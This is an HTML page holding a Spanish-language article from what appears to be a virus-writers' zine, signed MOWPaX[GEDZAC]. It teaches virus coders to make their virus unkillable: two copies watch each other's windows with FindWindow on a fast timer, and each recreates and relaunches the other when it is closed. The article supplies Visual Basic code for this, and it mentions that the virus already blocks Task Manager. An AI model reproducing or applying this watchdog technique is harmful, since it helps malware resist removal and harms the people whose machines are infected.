﻿
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"><style type="text/css">
<!--
body,td,th {
	color: #FFFFFF;
}
body {
	background-color: #000000;
	SCROLLBAR-FACE-COLOR: #000000; 
	SCROLLBAR-HIGHLIGHT-COLOR: #0080c0; 
	SCROLLBAR-SHADOW-COLOR: #0080c0; 
	SCROLLBAR-3DLIGHT-COLOR: #000000; 
	SCROLLBAR-ARROW-COLOR: #c0c0c0; 
	SCROLLBAR-TRACK-COLOR: #000000; 
	SCROLLBAR-DARKSHADOW-COLOR: #000000

}
.style55 {font-family: "Courier New", Courier, monospace; font-size: 12px; }
.style62 {
	font-family: "Courier New", Courier, monospace;
	font-size: 14px;
	color: #0066CC;
	font-weight: bold;
	font-style: italic;
}
.style63 {font-family: "Courier New", Courier, monospace; font-size: 14px; color: #f88204; font-weight: bold; }
.style66 {color: #CCCCCC}
.Estilo4 {font-size: 14px; color: #FFFFFF; }
.Estilo5 {font-size: 18px; color: #FFFFFF; font-weight: bold; }
.Estilo6 {font-size: 14px; color: #00FF00; font-weight: bold; }
.Estilo8 {color: #0066FF}
.Estilo16 {font-size: 14px; color: #FFFFFF; font-weight: bold; }
.style94 {color: #FFFF00}
.style96 {font-family: "Courier New", Courier, monospace; font-size: 12px; color: #999999; }


-->

</style>
</head>

<body>

  <div align="left">
<p><span class="style55"><img src="../0x01.png" width="585" height="107"><bR>
      <span class="style66">#Siempre cargado en memoria</span><br>
    #Autor: <strong>MOWPaX[GEDZAC]</strong> <em>&lt;mowpax@gedzac.com&gt;</em></span><br>
    </p>
  </div>
  <div align="left">
    <p align="justify" class="style55">Creo  que la mayoria de los coders siempre buscan la posibilidad de que sea  “imposible” matar la ejecución de su virus. Yo buscando alguna manera, se me  ocurrio una idea, que funciona a la perfeccion.</p>
    <p align="justify" class="style55">Primero  lo que deberiamos hacer, es que cuando el virus se ejecute, haga 2 copias o mas  de el y ejecutarlas, entonces ahí tendriamos el virus ejecutandose 2 veces.<br>
      Un  usuario comun los cerraria con el taskmgr, pero seguro que nuestro virus ya lo  bloqueo, asi que buscara algun mataprocesos, y sin ningun problema lo cerrara.<br>
    Entonces  lo que haria el virus es verficar cada cierto tiempo si nuestra copia esta en  ejecución:<bR>
      <span class="style94">Virus1-&gt;Verifica-&gt;Virus2<br>
    Virus2-&gt;Verifica-&gt;Virus1</span></p>
    <p align="justify" class="style55">Si  por alguna razon el virus 1 se encuentra con que virus 2 no esta en ejecución,  lo vuelve a ejecutar (seria mejor que antes de ejecutarlo lo cree de nuevo por  las dudas de que ya haya sido borrado).</p>
    <p align="justify" class="style55">Ahora  se preguntaran, ¿De que manera verifico si mi hermano esta en ejecucion?<br>
    Para  entender el code, paso a explicar la   Api que utilizare, FindWindow</p>
    <p class="style96">Declare Function FindWindow Lib &quot;user32&quot; Alias  &quot;FindWindowA&quot; (ByVal lpClassName As String, ByVal lpWindowName As  String) As Long</p>
    <p align="justify" class="style55">Veamos  su estructura:<br>
    <strong>lpClassName = </strong>Aca tendriamos que asignar el ClassName de  la ventana a buscar.<br>
    <strong>lpWindowName = </strong>Aca iria el titulo de la ventana a  buscar.</p>
    <p align="justify" class="style55">Si  no conocemos alguna de esas dos le ponemos el valor <strong>vbNullString</strong></p>
    <p align="justify" class="style55">Ejemplo:<br>
      <span class="style96">Jandle =  FindWindow(vbNullString, “Editor del Registro”)<br>
      If Jandle &lt;&gt; “” then<br>
    Msgbox “Handle del registro: ”  + Jandle<br>
    Else<br>
    Msgbox  “El registro no esta abierto”<br>
    End if</span></p>
    <p align="justify" class="style55">Ese  ejemplo nos daria como resultado el handle del regedit si es que esta abierto.</p>
    <p align="justify" class="style55">Para  saber si nuestro hermano esta abierto tendriamos que poner en vez de “Editor  del Registro” el caption del form de nuestro virus, y si el resultado da 0, es  porque nuestro hermano ha sido cerrado, entonces lo volvemos a ejecutar.<br>
    Ejemplo:<br>
    <br>
      <span class="style96"><strong>Private Sub  Form_Load()</strong><br>
    Me.Caption  = App.exename<br>
    <strong>End Sub</strong></span></p>
    <p class="style96">Eso  haria que cada hermano tenga como caption del form, su nombre.</p>
    <p class="style96">Entonces  en un timer podriamos poner algo asi:<br>
        <br>
        <strong>Private Sub Timer1_Timer()</strong><br>
    Doevents<br>
    Virus1 =  FindWindow(vbNullString, &quot; Virus2&quot;)<br>
    Virus2 =  FindWindow(vbNullString, &quot;Virus1&quot;)<br>
    'If Virus1 = &quot;0&quot; Then  Call Centinela(&quot;Virus2&quot;)<br>
    'If Virus2 = &quot;0&quot; Then  Call Centinela(&quot;Virus1&quot;)<br>
      <strong>End Sub</strong></p>
    <p class="style96"><strong>Sub Centinela (Virus)</strong><br>
  FileCopy App.EXEName +  &quot;.exe&quot;, “C:\” + Virus + “.exe”<br>
    Shell “C:\” + Virus + “.exe”<br>
      <strong>End Sub</strong></p>
    <p align="justify" class="style55">Paso a explicar:<br>
    Cada  hermano va a tener un caption en el form diferente:<br>
    Virus1.exe = virus1<br>
    Virus2.exe = virus2</p>
    <p align="justify" class="style55">Entonces  con FindWindow, buscamos esas ventanas, si nos devuelve un handle es porque el  virus esta abierto, sino es porque ha sido cerrado, tonces llamamos al Sub  Centinela, pasandole el nombre del hermano que ha sido cerrado, lo creamos y lo  volvemos a ejecutar.<br>
    Recomiendo  que el timer tenga un intervalo bastante chico, yo probe con intervalo 1, y me  andubo a la perfeccion, y me fue imposible cerrar el virus.</p>
    <p align="justify" class="style55">Espero  que este articulo haya sido de interes para ustedes, ya que a mi me parecio una  excelente forma de proteger la ejecución de nuestro virus.</p>
</div>
    <div align="left" class="style55"></div>
</body>
</html>
